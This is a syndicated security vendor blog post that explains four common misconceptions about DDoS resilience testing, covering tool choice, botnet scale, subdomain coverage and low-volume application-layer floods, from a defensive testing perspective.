Four Misconceptions about DDoS Testing
Most organizations already understand the importance of running a controlled DDoS attack to evaluate the resiliency of their application and to practice event response. However, there are still some misconceptions about the process, tools, and goals of DDoS testing.
You can DIY – all you need is a DDoS attack tool
There are many options for running DDoS simulations to validate your protection. There are open-source attack tools, such as HTTP Unbearable Load King (HULK), Slowloris, and many others. Or you can use commercial, self-service tools from different vendors, which will allow you to independently employ various DDoS attack vectors.
But here’s the catch. Your goal is not just to launch attacks and mark them with pass/fail. Rather, you want to challenge your defenses with sophisticated attacks that are as similar as possible to those that would be used by a hacker, after analyzing your system for weak points. And more importantly, you need to be able to draw conclusions from the results and improve your protection – with better attack identification, configuration tweaks, or changes to your core architecture.
DDoS testing requires specific expertise, with time and resources dedicated to planning, execution, and assessment of defense hardening options.
Simulating an attack from a few machines can validate your protection against a large botnet attack
A DDoS simulation test that generates traffic from a few machines cannot realistically predict how your systems will behave under an attack using a large botnet, such as with 1,000 machines and multiple IP addresses.
Beyond the obvious difference in traffic volume, a DDoS attack executed from many different IP addresses will be able to bypass IP-based protection mechanisms like rate limit or IP reputation. It’s simply impossible to test the effect of such an attack with a smaller-size simulation.
Testing your top parent domain covers your bases
Companies often think that running a test on the top domain or address is sufficient to predict the outcome of an attack on other addresses – a subdomain or a different hostname.
But the reality is that subdomains, for example, often redirect to a different service, using different systems and protection architecture. We often discover during testing that, unlike the top domain, a subdomain providing business-critical services is not covered by the organization’s DDoS protection system, such as Imperva or Akamai, and is completely vulnerable to an attack.
Simulating a large-volume attack is the most important
DDoS attacks are typically associated with large traffic volumes. A popular notion is that the larger the attack, the more potent it is. This is a misconception, as application-layer attacks like HTTP flood can be extremely effective in bringing down web and application servers using smaller traffic volumes that are less likely to be discovered.
Functional areas of a website with real-time data interaction and processing using several services are most vulnerable to such attacks. Think,for example, of a login page that constantly communicates with a database server. It is wide open to low-level traffic volumes that are difficult to identify as a DDoS event.
*** This is a Security Bloggers Network syndicated blog from Red Button authored by Ziv Elyashiv. Read the original post at: https://www.red-button.net/4-ddos-testing-misconceptions/